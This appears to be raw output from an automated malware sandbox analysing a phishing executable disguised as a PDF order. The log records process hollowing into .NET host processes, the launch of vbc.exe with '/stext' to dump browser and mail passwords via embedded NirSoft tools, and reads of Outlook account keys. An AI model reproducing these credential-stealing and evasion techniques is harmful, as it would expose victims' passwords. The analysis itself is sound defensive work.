              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00412084 appears 39 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00444B90 appears 36 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0041607A appears 66 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004083D6 appears 32 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E31398 NtUnmapViewOfSection,5_2_09E31398
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040978A
              Source: ORDER-NEW....pdf.exeBinary or memory string: OriginalFilename vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameReborn Stub.exe" vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFm.dll& vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameReborn Stub.exe" vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameFm.dll& vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.709923346.0000000002C71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameclsRP.dll, vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.709923346.0000000002C71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameReborn Stub.exe" vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.709383685.0000000001240000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameclsRP.dll, vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.662259035.00000000008A6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameORDER-NEW.exeT vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exeBinary or memory string: OriginalFilenameORDER-NEW.exeT vs ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: ORDER-NEW....pdf.exeStatic PE information: Section: )xrUhX ZLIB complexity 1.00031528433
              Source: ORDER-NEW....pdf.exeVirustotal: Detection: 62%
              Source: ORDER-NEW....pdf.exeReversingLabs: Detection: 93%
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeFile read: C:\Users\user\Desktop\ORDER-NEW....pdf.exeJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\ORDER-NEW....pdf.exe "C:\Users\user\Desktop\ORDER-NEW....pdf.exe"
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmp
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB202.tmp
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB202.tmpJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\7e8a2afc-e75b-3dcf-f7ef-7d8629ca2b45Jump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@11/9@0/0
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00418073 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,8_2_00418073
              Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 5.2.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 5.2.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 5.0.AppLaunch.exe.400000.1.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
              Source: 5.2.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
              Source: 5.2.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
              Source: 5.2.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
              Source: 5.0.AppLaunch.exe.400000.1.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
              Source: 5.0.AppLaunch.exe.400000.1.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
              Source: 5.0.AppLaunch.exe.400000.1.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
              Source: 5.0.AppLaunch.exe.400000.1.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 5.0.AppLaunch.exe.400000.1.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 5.2.AppLaunch.exe.400000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00417BE9 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,8_2_00417BE9
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00413424 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,8_2_00413424
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6860
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMutant created: \Sessions\1\BaseNamedObjects\714e5fbb-f83f-4388-95bc-ab8eaa6f89ea
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004141E0 FindResourceW,SizeofResource,LoadResource,LockResource,8_2_004141E0
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u206b????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u206b????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u206b????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: ORDER-NEW....pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: ORDER-NEW....pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: mscorlib.pdbD source: ORDER-NEW....pdf.exe, 00000000.00000000.716149183.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.706455152.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740808600.00000000082D5000.00000004.00000001.sdmp
              Source: Binary string: System.pdbd source: WER450B.tmp.dmp.9.dr
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp
              Source: Binary string: System.Core.ni.pdbRSDSD source: WER450B.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.716135209.00000000082D2000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740801711.00000000082D2000.00000004.00000001.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WER450B.tmp.dmp.9.dr
              Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: AppLaunch.exe, 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, AppLaunch.exe, 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER450B.tmp.dmp.9.dr
              Source: Binary string: .pdb+ source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb+ source: ORDER-NEW....pdf.exe, 00000000.00000000.716135209.00000000082D2000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740801711.00000000082D2000.00000004.00000001.sdmp
              Source: Binary string: C:\Users\user\Desktop\ORDER-NEW....pdf.PDBh source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdba source: ORDER-NEW....pdf.exe, 00000000.00000002.730604414.0000000000EC8000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb* source: ORDER-NEW....pdf.exe, 00000000.00000000.716149183.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.706455152.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740808600.00000000082D5000.00000004.00000001.sdmp
              Source: Binary string: System.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: (P3o0C:\Windows\mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000002.730604414.0000000000EC8000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp, WER450B.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.716149183.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.706455152.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740808600.00000000082D5000.00000004.00000001.sdmp
              Source: Binary string: ORDER-NEW....pdf.PDB source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: C:\Users\user\Desktop\ORDER-NEW....pdf.PDB source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: System.Drawing.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: AppLaunch.exe, 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, AppLaunch.exe, 00000005.00000002.933041044.0000000006FAE000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp
              Source: Binary string: System.Core.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Users\user\Desktop\ORDER-NEW....pdf.PDB[ source: ORDER-NEW....pdf.exe, 00000000.00000002.730604414.0000000000EC8000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp
              Source: Binary string: System.ni.pdb source: WER450B.tmp.dmp.9.dr
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05437504 push E801025Eh; ret 5_2_05437509
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054374FC push E802005Eh; retf 5_2_05437501
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054360CF push es; ret 5_2_054360D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0543326C push ss; retf 5_2_0543326D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054332F5 push ss; retf 5_2_054332F6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0543F28C push 850FD83Bh; ret 5_2_0543F291
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00444975 push ecx; ret 8_2_00444985
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00444B90 push eax; ret 8_2_00444BA4
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00444B90 push eax; ret 8_2_00444BCC
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00448E74 push eax; ret 8_2_00448E81
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0042CF44 push ebx; retf 0042h8_2_0042CF49
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00412341 push ecx; ret 18_2_00412351
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00412360 push eax; ret 18_2_00412374
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00412360 push eax; ret 18_2_0041239C
              Source: ORDER-NEW....pdf.exeStatic PE information: section name: )xrUhX
